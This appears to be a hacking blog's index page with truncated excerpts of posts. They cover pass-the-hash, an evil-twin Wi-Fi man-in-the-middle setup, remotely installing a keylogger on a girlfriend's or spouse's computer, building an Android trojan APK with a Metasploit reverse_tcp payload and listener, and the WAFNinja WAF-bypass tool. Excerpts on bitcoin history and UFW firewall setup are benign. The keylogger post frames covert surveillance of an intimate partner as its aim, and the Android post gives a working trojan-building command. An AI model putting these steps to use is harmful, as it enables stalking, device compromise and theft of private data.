Skip to main content

Posts

passing the hash

passing the hash  expert metasploit penetration testing course 

Set Up an Eviltwin

Set Up an Eviltwin When I tried to set up an eviltwin for a MitM-constelation in kali 2.0, I couldn't provide internet to the victim. The origin was the brctl bridging. I have read many tutorials but all of them where explained in backtrack and older versions of kali. So i was searching for a solution without using brctl and this solution will be explained now. This will just work on unencrypted wireless-environments. Step 1 Sniff the Air First victims AP information must be observerd set wifi-adpater in monitor mode there are two options to do so, I prefer this commands "ifconfig wlan0 down" "iwconfig wlan0 mode monitor" "ifconfig wlan0 up" this is the second one "airmon-ng start wlan0" if you have trouble with this type "airmon-ng check" and maybe kill some of the PIDS, but be aware...

How to Remotely Install a Keylogger onto Your Girlfriend's Computer

How to Remotely Install a Keylogger onto Your Girlfriend's Computer Welcome back, my greenhorn hackers! Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim's computer using Metasploit. The answer is a resounding "YES"! So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife's, or husband's computer. For those of you wondering what a keylogger is, the simple answer is that it's a piece of software or hardware that captures every keystroke and saves them for retrieval by you, the attacker. These types of devices have long been used by hackers to capture logins, passwords, social security numbers, etc. Here we will use it to capture the keystrokes of a cheating girlfriend. S...

Hack Android Using Kali (Remotely)

Hack Android Using Kali (Remotely) Hello Hackers! Welcome to arab black hat blog: This is a tutorial explaining how to hack android phones with Kali. I can't see any tutorials explaining this Hack/Exploit, so, I made one. ( Still ,you may already know about this ) Step 1: Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3: Set-Up a Listener: After it...

البيتكوين .. تاريخه و حاضره و مستقبله

البيتكوين .. تاريخه و حاضره و مستقبله ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ * عام 2007 مبرمج يابانى إسمه # ساتوشى_ناكاموتو قام بالعمل ع لى ورقة بحثية تخيل فيها نظام مالى عالمى جديد قائم على سياسة الإنتقال الحر لرؤوس الأموال بعيداً عن سلطة البنوك المركزية للدول .. لم يكن ساتوشى هو أول من فكر بهذا الشأن لكن فكرته هى من وجدت الحاضنة الشعبية لها .. هو إخترع شيئاً قد يغير المفاهيم المالية العالمية مستقبلاً .. ساتوشى إخترع # بيتكوين - # Bitcoin * ساتوشى أراد إختراع نقود لكن بدون مواصفات النقود التقليدية فهى نقود غير ملموسة و لا توجد بنوك مركزية تحكم إصدارها و لا تحظى بالقبول العام حتى إن وقت إصدارها لم يكن لها أى قبول نهائياً بين الناس فما الذى سيغريهم لإمتلاكها ؟ .. كيف سيقنعهم بإقتناء تلك العملة و ماذا سيفعلوا بها بعد إقتنائها ؟ ساتوشى لعب على نقطة مهمة ترفع من سعر أى سلعة فى العالم .. # الندرة * صمم ساتوشى النظام الإليكترونى لبيتكوين بأن يسمح له بإنتاج 21 مليون وحدة فقط و بعدها سيتم إيقاف الإنتاج أو إيقاف التعدين كما هو متعارف عليه و...

WAFNinja – Tool to attack Web Application Firewall

WAFNinja – Tool to attack Web Application Firewall WAFNinja is a tool which contains two functions to attack Web Application Firewalls. WAFNinja - Penetration testers favorite for WAF Bypassing WAFNinja is a CLI tool written in Python. It shall help penetration testers to bypass a WAF by automating steps necessary for bypassing input validation. The tool was created with the objective to be easily extendible, simple to use and usable in a team environment. Many payloads and fuzzing strings, which are stored in a local database file come shipped with the tool. WAFNinja supports HTTP connections, GET and POST requests and the use of Cookies in order to access pages restricted to authenticated users. Also, an intercepting proxy can be set up. Usage: wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ... EXAMPLE: fuzz : python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ...

How To Setup a Firewall with UFW on an Ubuntu and Debian Cloud Server

Introduction One of the first lines of defense in securing your cloud server is a functioning firewall. In the past, this was often done through complicated and arcane utilities. There is a lot of functionality built into these utilities, iptables being the most popular nowadays, but they require a decent effort on behalf of the user to learn and understand them. Firewall rules are not something you want yourself second-guessing. To this end, UFW is a considerably easier-to-use alternative. What is UFW? UFW, or Uncomplicated Firewall, is a front-end to iptables. Its main goal is to make managing your firewall drop-dead simple and to provide an easy-to-use interface. It’s well-supported and popular in the Linux community—even installed by default in a lot of distros. As such, it’s a great way to get started securing your sever. Before We Get Started First, obviously, you want to make sure UFW is installed. It should be installed by default in Ubuntu, ...